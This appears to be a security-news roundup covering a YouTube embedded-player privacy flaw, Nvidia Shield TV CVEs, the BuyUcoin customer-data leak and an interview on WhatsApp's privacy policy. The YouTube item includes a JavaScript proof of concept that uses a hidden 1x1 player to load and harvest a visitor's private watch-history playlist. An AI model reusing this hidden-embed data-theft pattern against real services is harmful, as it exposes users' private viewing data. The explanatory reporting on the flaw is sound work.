
Security Researcher Exposes a YouTube Embedded-Player Flaw That Put Users' Privacy at Risk


Security researcher David Schutz disclosed a flaw in YouTube's embedded player that could have given a malicious website access to a visiting user's viewing history, favorites, and other private playlists. All an attacker would have needed was a page under their control with a YouTube player embedded in it; the victim only had to open that page.

Google paid Schutz a $1,337 bounty for the report. He explained that he found the issue by linking two things in a somewhat "unexpected" manner. Website developers use the YouTube embedded player to place videos on their own sites, and this player also exposes an API (Application Programming Interface) to the page that embeds it.

The API lets a page drive the player with the same actions a user would normally perform on YouTube itself, such as loading a new video or playlist or playing and pausing the player, and it also lets the page query the player for information about what is currently loaded, including the list of videos in the current playlist.

Every YouTube user has a few personal playlists with fixed IDs: for example, the playlist with the ID 'HL' holds the user's watch history and the one with the ID 'WL' holds the user's Watch Later list, and so on.

David Schutz explained the vulnerability in a blog post: "Since the YT embedded player is also logged in to YT, a malicious website could have embedded a player, instructed it to play e.g. the 'HL' playlist (which would start playing the currently visiting user's watch history), and get the contents of the playlists using the API the embedded player has, thereby stealing the watch history of the user who opened the website".

“The attacker could also have prepared a page for a specific victim, which when opened by that victim, would steal the victim’s unlisted videos (which otherwise would require knowing the ID to watch). The main issue was that you were able to load private playlists into the player in the name of the victim, and later steal the contents of those private playlists,” the post further read. 
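The attack flow Schutz describes, written out as an added example (this is not code from his write-up or from YouTube). It uses only documented YouTube IFrame Player API calls (YT.Player, loadPlaylist, getPlaylist). YouTube fixed the server side after the report, so a logged-in embedded player no longer loads another user's private playlists; the code illustrates how the two pieces combined, not a working attack today. It assumes a page containing an element with id "player" and the standard https://www.youtube.com/iframe_api script, which calls the onYouTubeIframeAPIReady hook; the helper names are ours.

```javascript
// Added example: the embedded-player playlist leak described in the article,
// built on the documented YouTube IFrame Player API. The server-side flaw has
// been fixed, so loading 'HL' in an embed no longer returns a victim's history.

// Private playlist IDs named in the article and what they contain.
const PRIVATE_LISTS = { HL: 'watch history', WL: 'Watch Later' };

// Turn whatever the player reports as its current playlist into a leak record.
// `player` is any object exposing getPlaylist() (the real YT.Player or a stand-in
// used in tests); getPlaylist() returns an array of video IDs once a playlist has
// loaded and null (or an empty array) before that.
function harvestPlaylist(player, listId) {
  const ids = player.getPlaylist();
  if (!Array.isArray(ids) || ids.length === 0) return null;
  return {
    list: listId,
    label: PRIVATE_LISTS[listId] || 'playlist',
    videos: ids.map((id) => `https://www.youtube.com/watch?v=${id}`),
  };
}

// Wire an embedded player so that, as soon as it is ready, it is told to play the
// chosen playlist by ID in the visiting user's session, and the first time a state
// change reports playlist contents they are handed to `onLeak`. The 1x1 size keeps
// the player effectively invisible on the attacker's page.
function buildStealer(YTGlobal, listId, onLeak) {
  let done = false;
  return new YTGlobal.Player('player', {
    height: '1',
    width: '1',
    events: {
      onReady: (e) => e.target.loadPlaylist({ listType: 'playlist', list: listId }),
      onStateChange: (e) => {
        if (done) return;
        const leak = harvestPlaylist(e.target, listId);
        if (leak) {
          done = true;
          onLeak(leak);
        }
      },
    },
  });
}

// Browser entry point (hypothetical attacker page): the iframe_api script calls
// this hook once YT.Player is available. Targets the 'HL' (watch history) list.
if (typeof window !== 'undefined') {
  window.onYouTubeIframeAPIReady = () =>
    buildStealer(window.YT, 'HL', (leak) => console.log(JSON.stringify(leak)));
}
```

The point to notice is that nothing here is exotic: an embed that carries the visitor's YouTube session, plus an API that both loads resources by ID and reads them back to the embedding origin, is enough. The fix belonged on YouTube's side (refusing to load private playlists into a third-party embed), not on the embedding page.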

Nvidia Shield TV Streaming Device for Gamers Found to Have Security Bugs


Nvidia, the California-based GPU and AI-computing company best known for designing graphics processing units (GPUs) for the gaming and professional markets and systems on a chip for the mobile and automotive markets, has disclosed security bugs in its Shield TV.

Nvidia acknowledged three security bugs in the Shield TV that could lead to denial of service, escalation of privileges, or information loss. The Shield TV is a set-top device aimed at gamers: it streams games from a gaming PC to the television and plays media from local and online sources. Nvidia published a security bulletin covering the cluster of bugs.

The most serious, CVE-2021-1068, sits in NVDEC, the Shield TV's hardware video decoder. It allows reads or writes to a memory location outside the intended boundary of a buffer, which may lead to denial of service or escalation of privileges. It is rated high severity, with a CVSS base score of 7.8.

The remaining two bugs are rated lower. CVE-2021-1069 was found in the NVHost function, where a null-pointer dereference could lead to information loss. CVE-2021-1067 lies in the implementation of the RPMB command status, where an attacker can write to the Write Protect Configuration Block; this may also lead to denial of service or escalation of privileges. Users can install the software update that fixes all three either from the update notice on the notification screen or via Settings > About > System update.

Indian Crypto Exchange BuyUcoin Hacked


In yet another data breach, sensitive information on almost 3.25 lakh (325,000) customers of India-based cryptocurrency exchange and wallet BuyUcoin has been exposed on the dark web. The leak includes names, email addresses, mobile numbers, encrypted passwords, user wallet details, order details, bank details, KYC details (PAN numbers, passport numbers), and deposit history.

Established in July 2016 and based in Delhi-NCR, India, BuyUcoin is a crypto wallet and trading platform where buyers and sellers can transact in digital assets such as Bitcoin, Ethereum, and Ripple.

According to independent cybersecurity researcher Rajshekhar Rajaharia, the 6GB MongoDB database dump contains three backup files holding BuyUcoin data.

"This is a serious hack as key financial, banking and KYC details have been leaked on the Dark Web," Rajaharia said and shared some screenshots of the leaked information. 

The leaked information could be used by attackers to run fraud attacks against individuals, the researcher said. He also added that the transaction details could let hackers work out victims' credit scores.

Researchers at cybersecurity firm Kela Research and Strategy Ltd first found the stolen data posted on the same forum alongside data from Wongnai Media Co Ltd, Tuned Global Pvt Ltd, Wappalyzer, Teespring Inc and Bonobos.com, which bears the hallmarks of the notorious hacking group ShinyHunters. "Over this past summer, ShinyHunters was seen publishing leaked information for free, uncovering a large number of individual records from all over the world," said Victoria Kivilevich, threat intelligence analyst at Kela Research.

According to Rajaharia, the hacker is the same one who earlier leaked BigBasket and JusPay data in India. Last November, one of India's best-known online grocers, BigBasket, found that data on more than 20 million customers had been stolen and put up for sale on the dark web for more than $40,000. More recently, Bengaluru-based digital payments gateway JusPay said that about 3.5 crore (35 million) records containing masked card data and card fingerprints were compromised by the hacker.

Denying the leak, BuyUcoin CEO and co-founder Shivam Thakral said, "We would like to reiterate the fact that only dummy data of 200 entries were impacted which was immediately recovered and secured by our automated security systems."

Naavi: Information collected from WhatsApp would be shared with Facebook and eventually be used for advertising

WhatsApp, the messaging app owned by Facebook, has begun notifying its roughly 2 billion users about an update to its privacy policy. Do you want to keep using the popular messaging app?

On 18 January we interviewed Vijayashankar Na (Mr. Naavi), a veteran cyber law specialist in India, who shared his views on WhatsApp's new privacy policy and how it affects users.

Please introduce yourself to our readers.

I'm the chairman of the Foundation of Data Protection Professionals in India (FDPPI), which is the primary organization in India working on data protection, providing certifications, audits, support and so on. Since 1998 I have been working on cyber law issues based on our law, the Information Technology Act. Moreover, I'm the founder of Cyber Law College, a virtual cyber law education institution. Now we have extended it to data protection.

On January 4, WhatsApp announced that from February 8, all users of the messenger (except residents of the EU and the UK) will be required to share their personal data with Facebook; the social network will have access to phone numbers, transaction information and IP addresses. What has changed?

Actually, compared to what happened before, there may not be significant changes. We know that WhatsApp has been acquired by Facebook, but we are not very sure whether information from WhatsApp was being shared with Facebook. I believe it was happening in the background without our knowledge. But maybe now, because they don't want to take any chances, particularly with the GDPR (General Data Protection Regulation) authorities, they wanted to be transparent about what they would like to do. I think this was driven more by GDPR considerations, to polish their current privacy policies so that any problems could be sorted out.

WhatsApp wanted to disclose the fact that some part of the information collected from WhatsApp would be shared with Facebook and eventually be used for advertising.

So we all know that WhatsApp is a free app. In fact, its growth in popularity was because it was free. But it cannot continue like that forever, because there has to be a revenue model for any company. Now WhatsApp has come out into the open and, through the new policy, has declared what kind of information it is likely to share.

WhatsApp holds two sets of data. One is the metadata: contact list, location, status, financial information and data such as your unique phone ID. All of it reflects certain characteristics of a person. That usage information itself is actually a treasure if properly analyzed for the purpose of profiling the person.

As we know from the news, WhatsApp's changes have already angered technology experts, privacy advocates, billionaire entrepreneurs and government organizations. But the main thing is that they provoked a flight of users. Why did this happen?

WhatsApp made a big mistake in the sense that they did not clarify properly what they want to do. They said that this change is only for business applications, but the pop-up about the update actually came to all individuals who have a personal WhatsApp account. Subsequently, WhatsApp said in a press release that this is only for business accounts, not for individual accounts. Then people asked, "Why did WhatsApp show this particular pop-up to me at all, if it was not meant for me?" It was psychologically very disturbing for people.

Moreover, the problem with WhatsApp today is PR. They drafted it in such a manner that it would actually create revulsion among people. In my opinion, it was bad PR: "Get it or leave it". We know that a privacy policy should be written in clear and precise terms that an ordinary person can understand. Given that, WhatsApp should have been a little more careful.

So it has become easy for people to download Signal or Telegram. And of course in India there will be a movement to develop our own indigenous apps. So maybe WhatsApp is going to lose more than it otherwise would have.

What do you think, why does Facebook need this metadata?

Instagram and Facebook will now be able to show even more targeted ads on Facebook and Instagram, having carefully studied the interests and preferences of users in the messenger. In addition, businesses will be able to accept payments in WhatsApp for products that users have selected in Instagram ads.

Whether we like WhatsApp or not, whether we like Facebook or not, they also have the right to say, "I cannot do it as a free service forever." Now, advertising requires profiling; without profiling, advertisements cannot be targeted.

If a person wants to give the information by way of consent, let him give it. So this is a fair game between business interests and personal privacy interests. That is how GDPR is built: there has to be a legal basis.

WhatsApp will read our messages. Is it true?

As it is generally stated, they are not supposed to be reading our messages. Our conversations are encrypted using end-to-end encryption and, the company says, even WhatsApp itself cannot access them. So the content is encrypted with some device-related ID; at the moment it leaves my device, it should be encrypted.

Now, if people go for backups or storage in the cloud, then there is an issue. So people should avoid cloud storage and keep backups only on the mobile.

In your article "WhatsApp needs to change its Jurisdiction clause in the Terms or else, exit from India" you said that "WhatsApp has created two different sets of policies, one offered by WhatsApp Ireland Ltd to the EU region and the other by WhatsApp LLC to other countries". How does this apply to India?

In India, on 8 February we were expecting parliament to pass the Indian data protection law. In my opinion, WhatsApp decided to change the privacy policy on 8 February only to preempt the data protection law.

When I said "we need to look for a change of WhatsApp in India", it was not because of the privacy issue; that is a question of analyzing the privacy policy, a matter of revising the privacy policy.

My issue was with one of the clauses in the terms of use: jurisdiction. Of course, this is not exclusive to WhatsApp; it happens in many other international web services. The jurisdiction clause says that if there is any dispute between a user of WhatsApp and WhatsApp, then the dispute has to be resolved in accordance with Californian law, in the district court of California or through binding arbitration there. It means that the use of WhatsApp in India is not going to have any grievance mechanism in India. This is not in accordance with our law; our law doesn't permit it. It is almost denying the government's interest. I'm not happy with that. I would like that to be changed.

Will you continue to use WhatsApp, or have you changed messenger?

In our professional circles we have actually made some moves. Many professionals prefer Signal. Of course, some people prefer Telegram a bit more. Earlier, Telegram was the most used platform due to the number of people allowed in groups. In fact, we were thinking of shifting our FDPPI group to Telegram.

What can you recommend to our readers?

If somebody is going to have serious professional discussions or financial discussions, then obviously they should look at shifting to Signal. If it is purely personal, family discussions, you can keep using WhatsApp. So you need to make a distinction between personal use, family use and professional use. If you want 500 people in your group, then you have no choice but to leave WhatsApp. If it's a small group that handles confidential information, you need to change to Telegram.

We've covered quite a bit in this conversation. Before we wrap up, is there anything else you'd like to add?

The only thing I want to say is that we need clarity among ordinary people on what privacy is and what it is that we are willing to protect in privacy. It is not absolute protection. It is always the protection of choice. And the fact is that, even if you shift from WhatsApp to Telegram, we don't know whether Telegram will remain free forever.

I feel there is a need for a harmonious relationship between the users and the organizations that make use of the data. That is the purpose of the data protection law. And when we interpret data protection law, again, we should not be totally one-sided. That is the beauty of this issue: balancing the whole thing.